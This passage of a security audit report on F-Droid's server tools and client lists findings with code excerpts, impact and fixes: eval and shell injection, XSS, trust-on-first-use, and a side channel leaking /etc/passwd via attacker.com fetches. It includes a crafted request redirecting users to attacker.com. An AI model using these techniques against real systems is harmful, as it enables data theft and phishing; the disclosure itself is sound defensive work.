<div style="margin-bottom: 5pt; line-height: 6mm;">If we construct the field UpdateCheckData in such a way, that <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">urlcode</span> is for example <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">file:https:///etc/passwd</span>, and <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">codeex</span> becomes: <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">'^a[^:]*:x:(1000)' /etc/passwd</span>, urlver is for example pointing to an attacker controlled domain: <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">https://attacker.com/startswitha</span>, and <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">verex</span> is something that matches in the result. Then depending on the match of <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">codeex</span> decides if the attacker controlled URL is retrieved or not leaking information about the default username in this example. With further such packages it is possible to recover the username, and possibly also the secret ssh key of this user for example.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Excerpt showing the infoleaking side channel:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">
vercode = "99999999"
if len(urlcode) > 0:
logging.debug("...requesting {0}".format(urlcode))
req = urllib.request.Request(urlcode, None)
resp = urllib.request.urlopen(req, None, 20)
page = resp.read().decode('utf-8')
m = re.search(codeex, page)
if not m:
raise FDroidException("No RE match for version code")
vercode = m.group(1).strip()
version = "??"
if len(urlver) > 0:
if urlver != '.':
logging.debug("...requesting {0}".format(urlver))
req = urllib.request.Request(urlver, None)
resp = urllib.request.urlopen(req, None, 20)
page = resp.read().decode('utf-8')
m = re.search(verex, page)
if not m:
raise FDroidException("No RE match for version")
version = m.group(1)
return (version, vercode)</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">High: sensitive information (like cryptographic keys) can be leaked.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 1.3cm; line-height: 6mm;">Recommendation: restrict URLs to HTTP(S) schemes.</div>
</div>
</div>
<a name="f26-code-injection-in-fdroidserver-checkupdates-py-through-eval--ed-user-supplied-data"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.5</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-005 — Code Injection in Fdroidserver Checkupdates Through Eval'ed User Supplied Data</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-005</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">The value of VercodeOperation supplied in the metadata of the app by the adversary is <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">eval</span>-ed in the fdroidserver script <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">checkupdates.py</span>.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">excerpt from <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">checkupdates.py:425</span>:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">op = app.VercodeOperation.replace("%c", oldvercode)
vercode = str(eval(op))</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">High: Arbitrary code can be executed</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Create a simple interpreter for the allowed rules, or do strict validation of the input.</div></div>
</div>
<a name="f27-code-injection-via-malicious-appid-in-fdroidserver-build-py"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.6</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-006 — Code Injection Via Malicious Appid in Fdroidserver Build.py</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-006</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">A maliciously crafted appid can be used to inject code in fdroidserver <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">build.py:1274</span></div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">build.py</span> uses the appid as a parameter passed to the shell</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">subprocess.call("fdroid publish {0}".format(app.id))</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">High: Arbitrary Code Execution</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Validate appids</div></div>
</div>
<a name="f29-javascript-injection-into-htmlified-package-descriptions-in-fdroidserver-metadata-py"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.7</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-007 — Javascript Injection Into HTMLified Descriptions in Fdroidserver Metadata</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-007</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">The <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">linkify</span> function of <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">DescriptionFormatter</span> in fdroidserver <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">metadata.py</span> allows for injection of javascript into the description of packages.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">excerpt from `metadata.py:557</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">index = txt.find("]")
...
url = txt[1:index]
index2 = url.find(' ')
...
else:
urltxt = url[index2 + 1:]
url = url[:index2]
...
res_html += '<a href="' + url + '">' + html.escape(urltxt, quote=False) + '</a>'</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">High: attacker can inject code into visitors browser</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 1.3cm; line-height: 6mm;">Recommendation: validate the URL and disallow schemas like <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">javascript:</span> and <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">file:</span>, possibly using a whitelist.</div>
</div>
</div>
<a name="f33-bluetoothserver-java-request-uri-included-in-response"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.8</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-008 — Unvalidated User Input Included in Response</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-008</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>html/JavaScript Injection</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">BluetoothServer.java: Request URI Included in Response</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">In file net/bluetooth/BluetoothServer.java, the server prepares response by including the request URI verbatim, without any validation.</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Line 194:
private Response respond(Map<String, String> headers, String uri) {
...
...
Lines 222-226:
if (f.isDirectory() && !uri.endsWith("/")) {
uri += "/";
Response res = createResponse(NanoHTTPD.Response.Status.REDIRECT, NanoHTTPD.MIME_HTML,
"<html><body>Redirected: <a href=\"" + uri + "\">" + uri + "</a></body></html>");
res.addHeader("Location", uri);</div></pre></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Reflected XSS leading to client side information disclosure</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">User supplied URI should be parsed and components validated before including it in the response.</div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">Alternatively, URLEncode or httpencode the URI.</div></div>
</div>
<a name="f39-trustonfirstuse-tofu-usage"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.9</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-009 — Applicatioin uses TrustOnFirstUse (TOFU) Usage unverified signing certificate</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-009</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Unverified trust</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Applicatioin uses TrustOnFirstUse (TOFU) potentially using unverified signing certificate.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;"> The verifySigningCertificate() function allows non-verified (and non-verifiable) new certificate into the DB. This code applies the TOFU - trust on first use.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Trust On First Use is useful to establish initial contact where apriori shared key is not available - or can not be available. This works ok if a user is prompted to decide whether presented key is to be trusted. For example, the first SSH connection from a client to a server prompts the user whether the certificate presented by the server is trusted.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">In case of fdroid app, it appears that the TOFU key is trusted without prompt to user. The TOFU key appears to be persisted in the the repo database thus making the TOFU key permanently trusted.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">In file IndexV1Updater.java:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">243: X509Certificate certificate = getSigningCertFromJar(indexEntry);
verifySigningCertificate(certificate);
417:
if (repo.signingCertificate == null) {
if (repo.fingerprint != null) {
String fingerprintFromJar = Utils.calcFingerprint(rawCertFromJar);
if (!repo.fingerprint.equalsIgnoreCase(fingerprintFromJar)) {
throw new SigningException(repo,
"Supplied certificate fingerprint does not match!");
}
}
Utils.debugLog(TAG, "Saving new signing certificate to database for " + repo.address);
ContentValues values = new ContentValues(2);
values.put(Schema.RepoTable.Cols.LAST_UPDATED, Utils.formatDate(new Date(), ""));
values.put(Schema.RepoTable.Cols.SIGNING_CERT, Hasher.hex(rawCertFromJar));
RepoProvider.Helper.update(context, repo, values);
repo.signingCertificate = certFromJar;
}
</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">In file RepoUpdater.java, while processing downloaded jar file (public method processDownloadedFile()starting at line 201):</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Line 237: assertSigningCertFromXmlCorrect();
...
...
Line 280: private void assertSigningCertFromXmlCorrect() throws SigningException {
// no signing cert read from database, this is the first use
if (repo.signingCertificate == null) {
verifyAndStoreTOFUCerts(signingCertFromIndexXml, signingCertFromJar);
}
...
...
Line 392:
private void verifyAndStoreTOFUCerts(String certFromIndexXml, X509Certificate rawCertFromJar)
throws SigningException {
...
...
Utils.debugLog(TAG, "Saving new signing certificate in the database for " + repo.address);
ContentValues values = new ContentValues(2);
values.put(RepoTable.Cols.LAST_UPDATED, Utils.formatDate(new Date(), ""));
values.put(RepoTable.Cols.SIGNING_CERT, Hasher.hex(rawCertFromJar));
RepoProvider.Helper.update(context, repo, values);
}
</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Customer response: </span></div><div style="margin-bottom: 5pt; line-height: 6mm;">The TOFU process is a bit more convoluted than it should be, that's for sure. The TOFU prompt is the "Add Repos" prompt, where the fingerprint can either be included from clicking a URL that includes it, like <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">https://guardianproject.info/fdroid/repo?fingerprint=B7C2EEFD8DAC7806AF67DFCD92EB18126BC08312A7F2D6F3862E46013C7A6135</span> or by manually typing it in.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">If there is no fingerprint provided, then yes, the first signing key seen by F-Droid will be the one that it trusted. We decided that if the user hasn't already provided it, then another prompt won't make that more likely.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Unverified signing certificate saved to DB makes it easier for future attacks to succeed, thus causing potential device compromise.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Use a mechanism similar to asking for pin before pairing two devices through BlueTooth, for mobile based repos.</div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">For non-mobile based repos, the TOFU key should not be stored permanently.</div></div>
</div>
<a name="f49--fdroid-client-exploiting-nearby-swap-feature-to-show-malicious-prompt-to-users-or-redirect-to-malicious-sites"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.10</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-010 — (fdroid Client) Exploiting "Nearby Swap" Feature to Show Malicious Prompt to Users or Redirect to Malicious Sites</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-010</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Malicious Use of Feature</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">The request to http:https://[client IP]:8888/request-swap is vulnerable as it can be sent by any user, to the client's device. This can be used to show malicious messages and also redirect users.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">While a user is using Nearby Swap feature on the application, it is possible to send the request to [http:https://[client](http:https://%5Bclient) IP]:8888/request-swap with any message. This message will be shown to the user as if it is being sent by fdroid application.</div>
<div style="text-align: center;"><div><img src="{% asset docs/second-audit-report/Screenshot.png %}" height="567"></div><div style="font-style: italic; text-align: center; margin-left: 1cm; margin-right: 1cm; margin-top: 0.5cm;"></div></div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Exploiting the request to redirect users</span></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Send the below request to the user's device and if the user will follow "Yes" prompt, he/she will be redirected to the provided domain.</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">POST /request-swap HTTP/1.1
Content-Length: 50
Content-Type: application/x-www-form-urlencoded
Host: 192.168.57.33:8888
Connection: close
User-Agent: F-Droid
repo=http:https://attacker.com%2Ffdroid%2Frepo%3Fabc.apk</div></pre>
<div style="text-align: center;"><div><img src="{% asset docs/second-audit-report/attacker_domain.png %}" height="567"></div><div style="font-style: italic; text-align: center; margin-left: 1cm; margin-right: 1cm; margin-top: 0.5cm;"></div></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">The user will get redirected to attacker.com if he/she selects the Yes to prompt.</div>
<div style="text-align: center;"><div><img src="{% asset docs/second-audit-report/Capture.PNG %}" width="340.2"></div><div style="font-style: italic; text-align: center; margin-left: 1cm; margin-right: 1cm; margin-top: 0.5cm;"></div></div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">This vulnerability may allow an attacker to show any message on the user's device, looking like fdroid's message. With a bit more user interaction, attacker can even redirect the mobile application user to a website of his own.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">The application should validate the message being shown to the user and its origin. Also accepting any message or domain from a user and redirecting the user to a different domain is a very insecure implementation. The users should not be redirected to any domain given by the other user. A validation of this parameter is also needed to be implemented.</div>
</div>
</div>
<a name="f12-weak-regexps-filtering-xss-and-unwanted-html-tags-in-fdroidserver-lint-py"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.11</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-011 — Weak Regexps Filtering XSS and Unwanted HTML Tags in Fdroidserver/lint.py</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-011</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Sanity checks in fdroidserver lint are easily evaded and allow injection of javascript code in descriptions of apps.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">The regular expressions used to blacklist certain HTML tags and javascript injections are easily evaded:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">(re.compile(r'.*<(iframe|link|script).*'),
...
(re.compile(r'''.*\s+src=["']javascript:.*'''),</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Moderate: Code Injection in websites displaying descriptions of apps.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 1.3cm; line-height: 6mm;">Deploy bleach against the descriptions.</div>
</div>
</div>
<a name="f13-key-alias-collisions-can-lead-to-dos-of-publishing-in-fdroidserver"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.12</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-012 — Key Alias Collisions Can Lead to DoS of Publishing in Fdroidserver</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-012</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Denial of Service</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat 